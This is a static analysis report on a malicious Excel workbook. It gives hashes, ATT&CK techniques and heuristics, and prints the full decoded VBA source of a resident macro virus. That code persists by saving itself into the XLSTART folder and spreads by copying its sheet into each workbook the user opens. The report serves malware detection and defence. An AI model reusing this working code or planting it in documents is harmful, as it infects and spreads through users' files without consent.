Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 5cd72ae289d65f55…

MALICIOUS

Office (OLE) / .XLS

Size: 124.0 KB
Created: 2010-03-18 09:59:00
Authoring application: Microsoft Excel
First seen: 2026-05-11
MD5: f00d60a3378b61dece1381e3e4d7e2ad
SHA-1: 0bdc5d563704570732912819476475657a5e8308
SHA-256: 5cd72ae289d65f55a4d3f676eeead2071771a866c8e7e96071b678c8a78bca65
Risk Score: 108

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1547.001 Registry Run Keys / Startup Folder
  • T1553.005 Mark-of-the-Web Bypass

The VBA macro `auto_open` sets up an `OnSheetActivate` hook that executes the `SearchSelf` subroutine. This subroutine checks for the presence of `nt².xls` in the Excel startup path (`Application.StartupPath`). If the file is not found, it copies the current workbook to the startup path and saves it as `nt².xls`, establishing persistence. It also attempts to copy the `nt²` sheet into other workbooks, indicating a spreading mechanism.

Heuristics (4)

  • VBA macros detected (severity: medium; 3 related findings; OLE_VBA_MACROS)
    Document contains VBA macro code
  • VBA copies the workbook into the Excel XLSTART startup folder (severity: high; OLE_VBA_XLSTART_PERSISTENCE)
    The macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour.
    Matched line in script
            ChDir Application.StartupPath
  • VBA infects other workbooks via an OnSheetActivate copy hook (severity: high; OLE_VBA_WORKBOOK_INFECTION_SPREADER)
    The macro installs an Application.OnSheetActivate handler that copies a sheet (carrying the macro) into the active workbook whenever a sheet is activated. This is the replication stage of a resident Excel macro virus: it infects every workbook the user opens.
    Matched line in script
        Application.OnSheetActivate = "SearchSelf"
  • Auto_Open macro (severity: low; OLE_VBA_AUTO)
    Auto_Open macro
    Matched line in script
    Private Sub auto_open()

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1191 bytes
SHA-256: 817ec2508106e860fa2acdafadbc60b8fa114e428447958bcc39259159851616
First 1,000 lines of the extracted script
Attribute VB_Name = "nt²"
Private Sub auto_open()
    Application.OnSheetActivate = "SearchSelf"
End Sub

Private Static Sub SearchSelf()
On Error Resume Next
Const Self As String = "nt².xls"
Dim Resident As Boolean, strCurrDir As String

    Application.ScreenUpdating = False
    Resident = Dir(Application.StartupPath & "\" & Self) = Self
    If Resident Then
       If ActiveWorkbook.Sheets(1).Name <> "nt²" Then
           Workbooks(Self).Sheets("nt²").Copy before:=ActiveWorkbook.Sheets(1)
       End If
    Else
        Sheets("nt²").Select: Sheets("nt²").Copy
        strCurrDir = CurDir()
        ChDir Application.StartupPath
        Workbooks(ActiveWorkbook.Name).SaveAs FileName:=Application.StartupPath & "\" & Self
        ChDir strCurrDir
        ActiveWindow.Visible = False
        Workbooks(Self).Save
    End If
    
     
End Sub

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True